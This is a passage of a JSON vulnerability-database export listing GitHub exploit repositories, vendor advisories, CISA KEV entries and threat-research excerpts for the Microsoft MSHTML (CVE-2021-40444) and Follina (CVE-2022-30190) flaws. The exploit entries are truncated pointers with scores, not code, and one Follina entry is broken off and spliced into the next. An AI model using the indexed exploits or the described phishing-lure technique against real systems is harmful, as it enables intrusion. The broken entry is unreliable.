{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": 
{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-22T21:43:08", "description": "# CVE 30190\n\n> Amine TITROFINE | December 17, 2022\n\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-14T13:38:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:34", "id": 
"3CCF78E3-E22A-54A3-907C-1D687E20BE7C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:41:37", "description": "# CVE-2022-30190\n\n> Based on https://github.com/JohnHammond/msdt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-02T07:56:28", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:29", "id": "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:59:41", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79 (Source Code)_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-30T07:31:59", "description": "# CVE-2022-30190 (Follina)\n\n[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-19T18:09:47", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:57:47", "id": "DD36D028-7FB1-5824-9756-09BA3927DCEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:07:37", "description": "# Follina - CVE-2022-30190\n\nFollina is a zero day allowing code 
"2022-06-10T14:57:17", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T02:17:48", "id": "BAA0F684-952E-5B9E-B207-0419A33AC53B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:40:38", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T09:32:10", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:16", "id": "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-02T17:59:17", "description": "A remote code execution vulnerability exists in Microsoft Support Diagnostic Tool, also known as, \"Follina\". 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Support Diagnostic Tool Remote Code Execution (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T00:00:00", "id": "CPAI-2022-0283", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. 
Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T23:25:24", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. 
An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. 
The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing as its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used against several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal Affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. 
